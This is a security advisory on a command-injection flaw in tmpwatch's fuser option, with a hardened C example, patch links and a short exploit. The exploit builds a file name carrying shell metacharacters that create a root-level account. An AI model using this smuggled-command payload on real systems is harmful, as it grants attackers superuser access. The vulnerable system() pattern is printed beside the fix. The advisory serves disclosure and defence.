Insecure call of external programs in tmpwatch
------------------------------------------------------------------------


SUMMARY

The tmpwatch utility is used in Red Hat Linux to remove temporary files.
This utility has an option to call the "fuser" program, which verifies if
a file is currently opened by a process. The fuser program is invoked
within tmpwatch by calling the system() library subroutine. Insecure
handling of the arguments to this subroutine could potentially allow an
attacker to execute arbitrary commands.

DETAILS

Affected Versions:
Red Hat Linux 7.0 (tmpwatch v2.5.1)
Red Hat Linux 6.2 (tmpwatch v2.2)
Conectiva 4.0, 4.0es, 4.1, 4.2, 5.0, prg gráficos, ecommerce, 5.1
Trustix Secure Linux
Mandrake 6.0, 6.1, 7.0, 7.1
Immunix OS 6.2

Immune Versions:
SuSE

Impact:
This vulnerability may allow local attackers to compromise superuser
access if the administrator uses tmpwatch in a non-default manner.

The tmpwatch tool removes files that have not been modified or accessed
within a specified amount of time. It was designed to securely remove
files by avoiding typical race condition vulnerabilities. System
administrators usually run this tool periodically to remove old temporary
files in world-writeable directories.

The tmpwatch tool uses the --fuser or -s options to avoid removing a file
that is in an open state in another process.  This option uses the
system() library subroutine to call the external program /sbin/fuser with
the file name being examined as an argument.  The system() subroutine
spawns a shell to execute the command.  An attacker may create a file name
containing shell metacharacters, which could allow them to execute
arbitrary commands if tmpwatch with the fuser option is used to remove the
file.
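
The pattern described above, next to a form that never involves a shell.
This is an added example, not code from tmpwatch or from the advisory; the
function names and the "fuser -s" invocation are assumptions made for
illustration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <unistd.h>

#define FUSER "/sbin/fuser"   /* path named in the advisory */

/* Pattern at fault: /bin/sh parses the name, so ';' '<' '|' become syntax. */
int in_use_system(const char *name)
{
    char cmd[4096];
    snprintf(cmd, sizeof cmd, FUSER " -s %s", name);  /* -s: assumed flag */
    return system(cmd) == 0;
}

/* Hardened: the name fills exactly one argv slot, whatever bytes it holds.
 * A leading '-' gets "./" so it cannot be read as an option. -1 = too long. */
int fuser_argv(const char *name, char *buf, size_t n, char *argv[4])
{
    int len = snprintf(buf, n, "%s%s", name[0] == '-' ? "./" : "", name);
    if (len < 0 || (size_t)len >= n) return -1;
    argv[0] = "fuser"; argv[1] = "-s"; argv[2] = buf; argv[3] = NULL;
    return 0;
}

/* fork + execv: no shell is started. Returns the exit status, or -1. */
int run_argv(const char *prog, char *const argv[])
{
    int status;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) { execv(prog, argv); _exit(127); }
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* 1 = some process has the file open, 0 = none, -1 = could not tell. */
int in_use_exec(const char *name)
{
    char buf[4096], *argv[4];
    int rc = fuser_argv(name, buf, sizeof buf, argv) < 0 ? -1 : run_argv(FUSER, argv);
    return rc == 0 ? 1 : rc == 1 ? 0 : -1;
}

int main(int argc, char **argv)
{
    for (int i = 1; i < argc; i++) printf("%s: %d\n", argv[i], in_use_exec(argv[i]));
    return 0;
}
```

A caller that deletes on "not in use" should treat -1 as "keep the file",
so a missing or failing fuser never widens what gets removed.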

Source code comparison between the Red Hat Linux 6.2 and 7.0 tmpwatch 
packages suggests this vulnerability was recognized and a fix was 
attempted. However, the fix is incorrect, and the vulnerability is still 
exploitable.

Exploit:
1. Compile and run:
#include <stdio.h>
#include <stdlib.h>

int main()
{
   FILE *f;
   /* file name carrying shell metacharacters */
   char filename[100] = ";useradd -u 0 -g 0 haks0r;mail [EMAIL PROTECTED]<blablabla";

   if((f = fopen(filename, "a")) == 0) {
      perror("Could not create file");
      exit(1);
   }
   fclose(f);
   return 0;
}

2. cp /usr/sbin/adduser /tmp
3. Just wait for mail.

Recommendations:
Do not use the --fuser or -s options with tmpwatch.

Red Hat has issued the following RPMs that contain fixes for this 
vulnerability.

Red Hat Linux 6.2:
Alpha:
ftp://updates.redhat.com/6.2/alpha/tmpwatch-2.6.2-1.6.2.alpha.rpm

Sparc:
ftp://updates.redhat.com/6.2/sparc/tmpwatch-2.6.2-1.6.2.sparc.rpm

i386:
ftp://updates.redhat.com/6.2/i386/tmpwatch-2.6.2-1.6.2.i386.rpm

Sources:
ftp://updates.redhat.com/6.2/SRPMS/tmpwatch-2.6.2-1.6.2.src.rpm

Red Hat Linux 7.0:
i386:
ftp://updates.redhat.com/7.0/i386/tmpwatch-2.6.2-1.7.i386.rpm

Sources:
ftp://updates.redhat.com/7.0/SRPMS/tmpwatch-2.6.2-1.7.src.rpm

Conectiva:
ftp://atualizacoes.conectiva.com.br/4.0/i386/tmpwatch-2.6.2-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/SRPMS/tmpwatch-2.6.2-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/tmpwatch-2.6.2-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/SRPMS/tmpwatch-2.6.2-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/tmpwatch-2.6.2-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/SRPMS/tmpwatch-2.6.2-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/tmpwatch-2.6.2-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/SRPMS/tmpwatch-2.6.2-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/tmpwatch-2.6.2-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/SRPMS/tmpwatch-2.6.2-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/tmpwatch-2.6.2-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/SRPMS/tmpwatch-2.6.2-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/tmpwatch-2.6.2-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/SRPMS/tmpwatch-2.6.2-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/tmpwatch-2.6.2-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/SRPMS/tmpwatch-2.6.2-1cl.src.rpm

Trustix Secure Linux:
This file can be found at:
http://www.trustix.net/download/Trustix/updates/1.1/RPMS/
Or
ftp://ftp.trustix.com/pub/Trustix/updates/1.1/RPMS/

Mandrake:
You can download the updates directly from:

ftp://ftp.linux.tucows.com/pub/distributions/Mandrake/Mandrake/updates
ftp://ftp.free.fr/pub/Distributions_Linux/Mandrake/updates

Linux-Mandrake 6.0:
6.0/RPMS/tmpwatch-2.6.2-1mdk.i586.rpm
6.0/SRPMS/tmpwatch-2.6.2-1mdk.src.rpm

Linux-Mandrake 6.1:
6.1/RPMS/tmpwatch-2.6.2-1mdk.i586.rpm
6.1/SRPMS/tmpwatch-2.6.2-1mdk.src.rpm

Linux-Mandrake 7.0:
7.0/RPMS/tmpwatch-2.6.2-1mdk.i586.rpm
7.0/SRPMS/tmpwatch-2.6.2-1mdk.src.rpm

Linux-Mandrake 7.1:
7.1/RPMS/tmpwatch-2.6.2-1mdk.i586.rpm
7.1/SRPMS/tmpwatch-2.6.2-1mdk.src.rpm

Immunix OS 6.2:
http://www.immunix.org:8080/ImmunixOS/6.2/updates/RPMS/tmpwatch-2.6.2-1.6.2_StackGuard.i386.rpm

Or

http://www.immunix.org:8080/ImmunixOS/6.2/updates/SRPMS/tmpwatch-2.6.2-1.6.2_StackGuard.src.rpm


--
Eko Sulistiono
MIKRODATA & AntiVirus Media
Web: http://www.mikrodata.co.id/
WAP: http://www.mikrodata.co.id/wap/index.wml
